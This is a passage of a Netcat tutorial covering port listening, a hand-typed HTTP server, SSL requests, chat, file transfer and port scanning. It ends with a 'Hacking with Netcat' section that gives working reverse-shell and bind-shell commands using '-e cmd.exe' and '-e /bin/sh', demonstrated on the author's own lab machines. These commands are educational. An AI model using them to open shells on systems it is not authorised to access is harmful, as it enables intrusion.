You can see the available options Netcat offers by simply typing in nc -h. By default, netcat creates TCP connections. You can create UDP connections using the -u flag. However, we’ll use the default TCP connection for now.

The -l flag can be used for listening and the -p flag is for specifying the port to listen on.

Let’s look at an example. We’ll make netcat listen on port 4000 by combining the two flags together:

nc -lp 4000

This command will make netcat start listening on port 4000. But you’ll only see the cursor blinking.

You can use the keyboard interrupt CTRL + C to stop the command.

Let’s turn on the verbose output by combining the -v flag:

nc -vlp 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
Ncat: Listening on 0.0.0.0:4000

Now you will see netcat telling you that it’s listening on port 4000. This is how you start listening on any port.

Creating a simple web server with Netcat

Now that you know how to listen on ports with Netcat, let’s try to create a simple webserver with netcat. You’ll learn how a server responds to a client in this section.

First, let’s start a Netcat listening on port 5000 in verbose mode:

nc -vlp 5000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::5000
Ncat: Listening on 0.0.0.0:5000

Now fire up your browser and try connecting on this port. Type localhost:5000/ in your browser. Hit enter and take a look at your terminal window running Netcat. You’ll see the browser request directly showing up in your Netcat terminal:

Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:46830.
GET / HTTP/1.1
Host: localhost:5000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

Side note: You can tell from the User-Agent value, which is Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8. You can also use a tool that analyzes user agent strings such as this https://developers.whatismybrowser.com/useragents/parse/, to find out. Just paste in the user agent string in the input field and click Parse this user agent.

Interesting, isn’t it? Can you guess which browser I’m using? It’s Firefox 89 on Ubuntu Linux.

Now that the client (Firefox) has requested the server (netcat) you can do more cool things.

You can start typing in the response Firefox will get.

However, you need to speak the language of the browser! Otherwise, you won’t see the output.

Remember the response Header we got from example.com in the previous section? Let’s take a look:

HTTP/1.1 200 OK
Age: 594540
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Sat, 10 Jul 2021 22:33:44 GMT
Etag: "3147526947+ident"
Expires: Sat, 17 Jul 2021 22:33:44 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Server: ECS (dcb/7EA3)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 1256

As always, the status code is the first line of the response. We do not require all of the responses, however.

We’ll just use the Status code, Content-Type and Server, which I’ve highlighted.

With that let’s try to construct our server message:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: nooblinux

After typing this in hit enter twice and create a new empty line.

Next, you’ll type in the HTML page yourself and see it showing up on the browser in real-time! We’ll create a title for our page in real-time. If you know the HTML you can do it yourself. You can also copy this in your terminal.

The message should look something like this:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: nooblinux

<!doctype html>
<title>NoobLinux</title>

Hit enter and you’ll see the browser tab change from localhost:5000 to NoobLinux. Here’s a quick video of me doing that, in case this is a bit confusing:

Cool! Now let’s do more. Create a heading with <h1></h1> tags.

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: nooblinux

<!doctype html>
<title>NoobLinux</title>
<h1>Can you see me?</h1>

Hit enter and voila! You’ll see the heading appearing in the browser in real-time.

You can keep playing like this and the browser will show output according to your messages.

Lastly, we’ll do a final example where we add a photo:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: nooblinux

<!doctype html>
<title> NoobLinux </title>
<h1>Can you see me?</h1>
<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/b/b6/Image_created_with_a_mobile_phone.png/1280px-Image_created_with_a_mobile_phone.png">

Communicating over SSL with Ncat

You can receive as well as create any connections over TCP and UDP protocols with Netcat. The traditional Netcat does not support SSL encryption and HTTPS. Ncat, however, comes with SSL support.

We can activate it by using the --ssl flag. If you haven’t installed Ncat, now would be a good time.

Now we’ll play with sending a HEAD request to github.com and see how to activate SSL support, and what happens when we don’t.

First we’ll send a HEAD request like we did in the beginning of the tutorial, to the github.com server, on port 80.

We’ll make the request by sending it from print by using printf and piping with Netcat (remember when we discussed this earlier).

printf 'HEAD / HTTP/1.1\r\nHost: github.com\r\n\r\n' | nc -v github.com 80

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 140.82.121.4:80.
HTTP/1.1 301 Moved Permanently
Content-Length: 0
Location: https://github.com/

You can see that the github.com server gives us the status code 301, which means a redirect should be done.

Indeed, the github server accepts connection only with HTTPS or SSL encryption with the HTTP requests.

Let’s try using the port 443 as we know it is for HTTPS.

printf 'HEAD / HTTP/1.1\r\nHost: github.com\r\n\r\n' | nc -v github.com 443

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 140.82.121.4:443.
Ncat: 37 bytes sent, 0 bytes received in 0.26 seconds.

It also fails this time. This is because ncat is sending requests without SSL encryption. We have to enable SSL encryption.

Type the following command using the --ssl flag of the Ncat command:

printf 'HEAD / HTTP/1.1\r\nHost: github.com\r\n\r\n' | nc -v --ssl github.com 443

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: SSL connection to 140.82.121.4:443. GitHub, Inc.
Ncat: SHA-1 fingerprint: 8463 B3A9 2912 CCFD 1D31 4705 989B EC13 9937 D0D7
HTTP/1.1 200 OK
Server: GitHub.com
Date: Mon, 12 Jul 2021 00:38:44 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, Accept-Language, Accept-Encoding, Accept, X-Requested-With
permissions-policy: interest-cohort=()
ETag: W/"94946c032884213d15c51f6ed29ed03e"
Cache-Control: max-age=0, private, must-revalidate
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; connect-src 'self' uploads.github.com www.githubstatus.com collector.githubapp.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events translator.github.com wss://alive.github.com github.githubassets.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com; frame-ancestors 'none'; frame-src render.githubusercontent.com render-temp.githubusercontent.com viewscreen.githubusercontent.com; img-src 'self' data: github.githubassets.com identicons.github.com collector.githubapp.com github-cloud.s3.amazonaws.com secured-user-images.githubusercontent.com/ *.githubusercontent.com customer-stories-feed.github.com spotlights-feed.github.com; manifest-src 'self'; media-src github.githubassets.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/socket-worker-3f088aa2.js gist.github.com/socket-worker-3f088aa2.js
Set-Cookie: _gh_sess=tYm0qZ0oXFzUG8Dc2YucTOhIJuxeFGVTx4tGW%2FZcYx4QI9MrYoSWsuVvGqMCZh0YG7eUdsDe6231%2FnGMLJsxNjhkF3mNyblLnF8mPQX%2BVltD6E98n0Tih9DUf2I49lYyOCjp6UvUewn1NAYW%2FGOKFUn8%2F2dUvHBJQ%2F3UKEE%2F9w97caNikSZDtZxnaF91O8H0AV%2FkKuUVwJASOsxJviza87B13bE9eLfzMej9ndm2Ywb5yfTUEYccO3sPjRHp7UkSWnRFkt5LHuAEMg81QCCgmA%3D%3D--cVgPJ6RLH%2FItXYgz--Rk9K72INktZw6RibFZJoxA%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax
Set-Cookie: _octo=GH1.1.1661960893.1626050330; Path=/; Domain=github.com; Expires=Tue, 12 Jul 2022 00:38:50 GMT; Secure; SameSite=Lax
Set-Cookie: logged_in=no; Path=/; Domain=github.com; Expires=Tue, 12 Jul 2022 00:38:50 GMT; HttpOnly; Secure; SameSite=Lax
Accept-Ranges: bytes
X-GitHub-Request-Id: 041C:0BCA:7B79525:7FD6376:60EB8F1A

Ncat: 37 bytes sent, 2595 bytes received in 0.26 seconds.

As you can see, now the output is showing correctly. We can also see the cookie and some encryption information as well in the header.

Sometimes you’ll require a certificate to connect to the host. You can create an SSL Certificate and SSL key with --ssl-cert and --ssl-key respectively. Find more on this on the Ncat user manual’s SSL page.

Creating a simple chat using Netcat

Now that you know how to create a client and a server with Netcat, let’s build both and create a chatting functionality between them.

You can do this over remote network machines or within your local network. We’ll just need two computers that can run Netcat (it can be a computer, virtual machine or phone with a terminal and netcat installed)

What we’ll do: On the first machine (doesn’t matter which) we’ll just run the command to create a server and listen on a port, in our case 4000. On the second machine we’ll run the command to connect to the first machine’s IP and port, thereby establishing the connection. From there we can just write messages from one machine and they’ll instantly appear on the other.

Let’s get started.

Within your local network

For our example, I’ll create a chat with a VMware virtual machine running Ubuntu 20.04.

You can try out the same thing, or you can use machines connected to your WiFi – such as if you have multiple computers that can have Netcat installed on them, or an Android phone running Termux (installed from f-droid.org on which you can install Netcat).

Most likely there are options for iOS, and other operating systems as well, however I haven’t tried them myself.

Make sure both the machines have Netcat installed.

First, figure out the private IP address (IPv4) of the computer where we’ll run the server on, because we’ll need to know it so we can connect to it from the second computer.

Finding your private IP address

On Linux, you can determine your private IP address using command such as ip addr, ifconfig or hostname -I (uppercase I).

Determine your private IP address using ip addr or ifconfig

We’ll use ip addr since it’s meant to be a replacement for ifconfig, and ifconfig may not come pre-installed on recent Linux systems.

When you run it, the system will display all your network interfaces.

ip addr

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
    link/ether 00:0c:29:12:e9:70 brd ff:ff:ff:ff:ff:ff
    altname enp2s1
    inet 192.168.145.131/24 brd 192.168.145.255 scope global dynamic noprefixroute ens33
       valid_lft 992sec preferred_lft 992sec
    inet6 fe80::c567:c033:897f:58ea/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

What we’re interested in is what comes after inet in the details for the network interface that we’re using.

Your output may display more network interfaces, such as eth0, wlan0 and so on.

To determine the network interface that you’re using you can use the route command:

route

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         _gateway        0.0.0.0         UG    100    0        0 ens33
link-local      0.0.0.0         255.255.0.0     U     1000   0        0 ens33
192.168.145.0   0.0.0.0         255.255.255.0   U     100    0        0 ens33

The Iface column on the same line with default in the Destination column should tell you the interface that you are using (the highlighted line).

As we can see, the interface I’m using is ens33, and if we look up to the output from where I ran ip addr, under ens33 and after inet we see 192.168.145.131.

So my private IP address is 192.168.145.131.

Determine your private IP address using hostname -I

You can also easily display your private IP address using hostname -I (uppercase I), however you will be shown multiple IPs if you have multiple configured interfaces.

For example, when I run it on the same machine as before, I get a quick and clean private IP address in the output.

hostname -I

192.168.145.131

However, when I run it on a different machine:

10.0.2.15 192.168.33.10

In this case, the second IP (192.168.33.10) is the one I can connect to on my local network via Netcat.

I usually use the ip addr method.

We’ll refer to the computers as:

1. Machine 1 – the computer whose private IP address we’ve determined, where we will create the server and listen on port 4000
2. Machine 2 – the computer that we’ll use to connect to Machine 1

Now, assuming that you’ve found your private IP address for Machine 1, create a server on it, listening on any port (I’ll use 4000). To do this run:

nc -vlp 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
Ncat: Listening on 0.0.0.0:4000

Now Netcat will be listening on Machine 1 which has the IP address of 192.168.145.131. This is our server.

Now let’s connect to this server from another device within our local network (which is Machine 2.

We’ll use the server’s IP address and port to connect to it. Run the following command, replacing the IP with your machine’s private IP address:

nc -v 192.168.145.131 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.145.131:4000.

As we can see our client has connected to the server. If we take a look at our server we’ll instantly see the machine connected to it:

Ncat: Connection from 192.168.145.1.
Ncat: Connection from 192.168.145.1:1049.

Now the client-server connection has been established. You can type in anything in any of the machines and you’ll see the message instantly on the other machine. Here are the commands and outputs of each machine:

n -vlp 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
Ncat: Listening on 0.0.0.0:4000
Ncat: Connection from 192.168.145.1.
Ncat: Connection from 192.168.145.1:1049.
Hi. Can you see this?
Yes, I can. Hi!
So what are you thinking about?
Oh, you know, tutorials & stuff.

nc -v 192.168.145.131 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.145.131:4000.
Hi. Can you see this?
Yes, I can. Hi!
So what are you thinking about?
Oh, you know, tutorials & stuff.

[Video] Demo of creating a simple chat using Netcat

Here’s a very short video demonstrating this. On the left there’s what we call Machine 1, which is an Ubuntu 20.04 virtual machine, and on the left I’m using Cmder on Windows 10.

Within a single computer

If you do not have access to another computer in your local network, you can also try this on your computer with two terminals.

Open two terminals and just follow the same procedure with the nc command.

Create a server and a client and you can send text from one to the other terminal and communicate between them in real-time.

Transferring files between two hosts using Netcat

You’ve already seen how Netcat can send texts from one host to another using the client-server setup. Now let’s learn to send some more useful things rather than just texts.

You can send any file over netcat. There are two ways to do this:

1. Serve the file on the Netcat server
2. Push the file from the client side

We’ll cover both.

Serve the file from a server

Let’s start with how to serve the file using the Netcat server.

In this method, the server has to be created on the machine that contains the file.

Pipe the file into the server:

cat nooblinux_assets.zip | nc -vlp 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
Ncat: Listening on 0.0.0.0:4000

On the other machine (also known as the client), type in the following to connect to the server and save the file, replacing the IP with your machine’s private IP:

nc -v 192.168.145.131 4000 > nooblinux_assets.zip

You will see the typical output.

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.145.131:4000.

And on the first machine (the server) you will see the typical output as we’ve seen before, when the other machine connects to it:

Ncat: Connection from 192.168.145.1.
Ncat: Connection from 192.168.145.1:1049.

Your file will transfer. But you might notice a problem with this method immediately – there’s no indication if the file completed transferring or not. The connection stays open.

This brings us to the second method.

Push the file to the server from the client

Now we’ll just listen on a port on the server and save whatever comes to it instead of serving the file.

This means the machine with the file will be the client and it will send the file to the server.

Let’s create a server and save the incoming data:

nc -vlp 4000 > whatever_may_come.zip

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
Ncat: Listening on 0.0.0.0:4000

Now let’s connect the client to the server and push the file:

nc -v 192.168.145.131 4000 < nooblinux_assets.zip

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.145.131:4000.
Ncat: 245394 bytes sent, 0 bytes received in 7.04 seconds.

This method works much better than the previous. It closes the connection as soon as the file is transferred.

So, you know that the file was successfully transferred and don’t have to worry about unfinished file transfer.

Checking if the file transfer was successful

You can check if the file you downloaded was finished transferring properly or if it is not the same file you wanted to download.

Checking the checksum of the file will reveal if the files are the same or not.

A simple way to do this is using the md5sum tool which uses the md5 hash algorithm.

On Windows you have md5sum.exe and you can run it like in the following examples, but only replace md5sum with md5sum.exe.

In my case,run the commands on each of the files (the original one and the received one) so you can check if the resulting checksums are identical.

md5sum nooblinux_assets.zip

3ba304b2acf42467b68ee9df05e5883e *nooblinux_assets.zip

md5sum whatever.zip

3ba304b2acf42467b68ee9df05e5883e  whatever.zip

If the hashes match up then they are the same file. This is a very simple yet quite effective method to check if the file transferred successfully.

That’s why you’ll see many websites provide the checksums of their files so you can crosscheck if you downloaded the same file or not. This is very important since hackers can alter your download with a malicious file.

Scanning ports with traditional Netcat

The traditional Netcat gives you the option to perform basic port scanning.

As we mentioned in the beginning of this tutorial, Ncat lacks this feature, since it’s “big brother”, Nmap, already has advanced port scanning capabilities.

If you’d like to learn more about it, you can check our comprehensive tutorial on how to use Nmap.

On Netcat, you can use the -z flag that doesn’t include the input/output and only tries to connect to the ports and finds out which ones are open.

Let’s scan a single port:

netcat -vz nooblinux.com 443

Connection to nooblinux.com 443 port [tcp/https] succeeded!

To scan a range of ports, use the following syntax. The “-w” flag tells it to wait for the seconds specified after it. In this case, it’ll wait 1 second for each request –

netcat -vzw1 scanme.nmap.org 20-25

netcat: connect to scanme.nmap.org port 20 (tcp) timed out: Operation now in progress
netcat: connect to scanme.nmap.org port 20 (tcp) failed: Connection refused
netcat: connect to scanme.nmap.org port 21 (tcp) timed out: Operation now in progress
netcat: connect to scanme.nmap.org port 21 (tcp) failed: Connection refused
Connection to scanme.nmap.org 22 port [tcp/ssh] succeeded!
netcat: connect to scanme.nmap.org port 23 (tcp) timed out: Operation now in progress
netcat: connect to scanme.nmap.org port 23 (tcp) failed: Connection refused
netcat: connect to scanme.nmap.org port 24 (tcp) timed out: Operation now in progress
netcat: connect to scanme.nmap.org port 24 (tcp) failed: Connection refused
netcat: connect to scanme.nmap.org port 25 (tcp) timed out: Operation now in progress
netcat: connect to scanme.nmap.org port 25 (tcp) failed: Connection refused

As you can see from the output, port 22 (ssh) is open.

You can also scan UDP ports using the -u flag:

nc -vzuw1 scanme.nmap.org 20-25

Hacking with Netcat

Hackers and penetration testers often use Netcat to get shell access in a remote system.

If you have a machine with remote code execution capabilities, you can use Netcat to create a reverse shell or a backdoor in that machine.

This allows you to execute commands as a user on that machine.

There are two ways to do this. You can either:

1. create a reverse shell
2. create a bind shell

Reverse Shell

In a reverse shell, the attack machine listens on a specific port and the target machine initiates a shell and connects to the attack machine.

Bind Shell

In the bind shell, the target machine initiates the shell and listens to a port. The attacker machine connects to the target machine and gets shell access.

Notice: We’ll be using the -e flag on Ncat to execute after connection. If you see the -e flag is not supported in the version of Netcat you’re using, install another one.

Creating a Reverse Shell using Netcat

To create a reverse shell with Netcat, start a server with any port listening on the attacking machine. You’ll then connect to it from the target machine. Then you’ll be able to execute commands on the target machine from the attacking machine.

I’ll use a Windows 10 machine and an Ubuntu 20.04 machine and try it both ways. The difference will be that when we execute remote code on Windows, we’ll use Windows Command Prompt cmd.exe instead of the Bourne shell sh.

Let’s see how that works.

Attacker: Linux / Target: Windows

Run the following command on the attacking machine (you can use another port, I’ll use 4000):

nc -vlp 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
Ncat: Listening on 0.0.0.0:4000

Now connect from the target machine with the shell access using the -e flag:

nc -v 192.168.145.131 4000 -e cmd.exe

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.145.131:4000.

On the attacking machine, you’ll see the connection message:

Ncat: Connection from 192.168.145.1.
Ncat: Connection from 192.168.145.1:19095.
Microsoft Windows [Version 10.0.19042.1083]
(c) Microsoft Corporation. All rights reserved.

D:\Downloads>

I ran the command from the D:\Downloads>.

Now you can type in some commands in the attack machine, and you’ll get replies from the target machine shell:

D:\Downloads>whoami

whoami
desktop-0i9jobe\shway

Here, I typed in the whoami command to see the current user (whoami also works on Windows 10). As you can see, it’s desktop-0i9jobe\shway. That’s my desktop name and username.

Let’s execute more commands:

D:\Downloads>ls

nooblinux_assets.zip
some_wallpaper.png
an_emoji.png
verification.jpeg
rufus.exe

You can execute commands on the target machine using the reverse shell like this from the attack machine.

Attacker: Windows / Target: Linux

Now let’s execute code remotely from Windows on Linux.

First we again create a server on our attacking machine, which is the Windows machine in my case (use the port of your choice):

nc -vlp 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
Ncat: Listening on 0.0.0.0:4000

And we’ll connect from the target machine (the Linux machine):

nc -v 192.168.100.16 4000 -e /bin/sh

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.100.16:4000.

You won’t see any prompt symbol, but now we should be able to execute commands from the Windows machine and onto the Linux machine.

whoami

ed

My user on the Linux machine is ed, so that’s correct.

hostname

nooblinux

We can execute many more commands but that is beyond the scope of this tutorial. I hope the above examples have given you an idea of what you can do.

Creating a Bind Shell with Netcat

Bind shell achieves the same purpose as the reverse shell. However, the process to create a bind shell is the opposite.

To create a bind shell, setup the target machine to listen on a port with shell access. As before, you will have to mention the appropriate command line interpreter. On Linux you can typically go with /bin/sh and on Windows with cmd.exe.

We won’t go into Linux->Windows, Windows->Linux scenarios such as we did for the reverse shell, but a simple example should give you a good idea of how to go about it both ways.

nc -vlp 4000 -e /bin/sh

nc -vlp 4000 -e cmd.exe

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4000
Ncat: Listening on 0.0.0.0:4000

After that, you just have to connect to the target from the attack machine:

nc -v 192.168.145.131 4000

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.145.131:4000.

Now you can execute commands from the attack machine. Remember, you may not see a prompt symbol, but you can execute commands normally.

Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.145.131:4000.
whoami
ed
pwd
/home/ed
ls
file
file.log
file.log.save
file.txt
master_downloaded.zip
master_serve.zip

Conclusion

In this tutorial, we covered the fundamentals of the Netcat utility. We hoped that you liked it and that it was easy to read and understand. You can learn more about Ncat from the Ncat Users’ Guide on Nmap.org. If you have any problems feel free to leave a comment or contact us and we’ll get back to you as soon as possible.